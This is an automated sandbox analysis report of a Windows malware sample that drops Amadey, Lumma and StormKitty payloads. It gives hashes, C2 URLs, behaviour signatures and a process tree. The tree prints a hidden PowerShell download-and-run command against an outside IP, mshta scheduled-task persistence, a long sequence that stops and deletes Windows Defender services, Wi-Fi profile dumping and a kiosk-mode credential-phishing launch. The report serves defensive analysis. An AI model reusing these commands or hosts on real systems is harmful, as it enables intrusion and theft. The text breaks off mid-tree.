Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 13:43

General

  • Target

    2025-04-02_1822720421bee50bc91b4821ba542f5c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    1822720421bee50bc91b4821ba542f5c

  • SHA1

    58b1305a2504d0fc06a7864f6b5cde2988757505

  • SHA256

    5f9f78e4c227d108ac7b585d452d7b08a207eb0c9017c1a3a850c4517c351af5

  • SHA512

    3f36e861b6dffabe2725303d37d51bc9a395dd0a77590bf4d862b631a38bbc65f0290ab91c4736094e5f88c9247c6c981dd6f903f763d299f49adf6f8d7e0dfb

  • SSDEEP

    24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:rTvC/MTQYxsWR7a0s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://hywnnavstarx.shop/FoaJSi

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://hadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2612
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:228
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_1822720421bee50bc91b4821ba542f5c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_1822720421bee50bc91b4821ba542f5c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5436
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn tYhTsma5118 /tr "mshta C:\Users\Admin\AppData\Local\Temp\WJeYMMs3p.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn tYhTsma5118 /tr "mshta C:\Users\Admin\AppData\Local\Temp\WJeYMMs3p.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5180
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\WJeYMMs3p.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CY6IVA6Q5TSM8HMS59JPBRMINC0BDCAK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Users\Admin\AppData\Local\TempCY6IVA6Q5TSM8HMS59JPBRMINC0BDCAK.EXE
            "C:\Users\Admin\AppData\Local\TempCY6IVA6Q5TSM8HMS59JPBRMINC0BDCAK.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1344
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3232
              • C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
                "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:612
                • C:\Users\Admin\AppData\Local\Temp\261.exe
                  "C:\Users\Admin\AppData\Local\Temp\261.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3652
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C767.tmp\C768.tmp\C769.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:736
                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                      "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:456
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C8BE.tmp\C8BF.tmp\C8C0.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                        10⤵
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:1816
                        • C:\Windows\system32\sc.exe
                          sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                          11⤵
                          • Launches sc.exe
                          PID:5080
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:2420
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:5684
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:3120
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:5204
                        • C:\Windows\system32\takeown.exe
                          takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:6092
                        • C:\Windows\system32\icacls.exe
                          icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:872
                        • C:\Windows\system32\sc.exe
                          sc stop "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:4688
                        • C:\Windows\system32\sc.exe
                          sc delete "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:956
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                          11⤵
                            PID:4484
                          • C:\Windows\system32\sc.exe
                            sc stop "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:2752
                          • C:\Windows\system32\sc.exe
                            sc delete "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:5524
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                            11⤵
                              PID:5868
                            • C:\Windows\system32\sc.exe
                              sc stop "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:4656
                            • C:\Windows\system32\sc.exe
                              sc delete "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2392
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                              11⤵
                                PID:3404
                              • C:\Windows\system32\sc.exe
                                sc stop "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:5608
                              • C:\Windows\system32\sc.exe
                                sc delete "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:2288
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:1820
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4740
                                • C:\Windows\system32\sc.exe
                                  sc delete "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5404
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                  11⤵
                                  • Modifies security service
                                  PID:4444
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:624
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5680
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:2060
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2312
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5176
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:3244
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:5448
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4620
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:1080
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2128
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5912
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:1076
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:5904
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:3160
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:6040
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1088
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2192
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:4712
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5736
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2656
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:2228
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4468
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2652
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:5648
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:6132
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5056
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:5180
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5540
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2236
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:5312
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:216
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:924
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:5764
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:1132
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:3148
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:5652
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:2372
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:3644
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:3056
                                                    • C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4736
                                                    • C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Accesses Microsoft Outlook profiles
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5896
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                        PID:4072
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 65001
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4860
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh wlan show profile
                                                          8⤵
                                                          • Event Triggered Execution: Netsh Helper DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                          PID:5872
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr All
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5564
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2380
                                                        7⤵
                                                        • Program crash
                                                        PID:4528
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4668
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 65001
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1424
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh wlan show networks mode=bssid
                                                          8⤵
                                                          • Event Triggered Execution: Netsh Helper DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2080
                                                    • C:\Users\Admin\AppData\Local\Temp\10418950101\4e3d3b50d0.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10418950101\4e3d3b50d0.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4652
                                                    • C:\Users\Admin\AppData\Local\Temp\10418960101\b7504f99f2.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10418960101\b7504f99f2.exe"
                                                      6⤵
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1384
                                                    • C:\Users\Admin\AppData\Local\Temp\10418970101\40f08c565b.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10418970101\40f08c565b.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:6056
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM firefox.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5284
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM chrome.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2536
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM msedge.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5564
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM opera.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5756
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /F /IM brave.exe /T
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4996
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                        7⤵
                                                          PID:1424
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                            8⤵
                                                            • Drops desktop.ini file(s)
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3204
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {7d29a2fc-ed9c-4370-a59a-f05375a45282} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                              9⤵
                                                                PID:3736
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {7e5c6b00-eda4-4ed6-b275-c2fb6b937e2b} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                9⤵
                                                                  PID:4372
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3892 -prefsLen 25213 -prefMapHandle 3896 -prefMapSize 270279 -jsInitHandle 3900 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3908 -initialChannelId {366a8574-2080-4929-9947-ea2ec55a1c8c} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:1068
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3900 -prefsLen 27325 -prefMapHandle 3896 -prefMapSize 270279 -ipcHandle 4144 -initialChannelId {3588701b-a96b-4360-9ff7-295a39afbed0} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                  9⤵
                                                                    PID:5324
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3000 -prefsLen 34824 -prefMapHandle 3044 -prefMapSize 270279 -jsInitHandle 3048 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3296 -initialChannelId {0b3bdf6d-a2b0-4a77-a103-96fbe6d80a45} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:672
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5032 -prefsLen 35012 -prefMapHandle 5036 -prefMapSize 270279 -ipcHandle 5044 -initialChannelId {65d463a3-9e8e-4f1b-8c19-f913a24d00bf} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:4788
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5284 -prefsLen 32952 -prefMapHandle 5288 -prefMapSize 270279 -jsInitHandle 5292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5300 -initialChannelId {870b4f44-c3ae-4e7e-9545-d1dd2d3b184e} -parentPid 3204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                    9⤵
                                                                    • Checks processor information in registry
                                                                    PID:3692
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
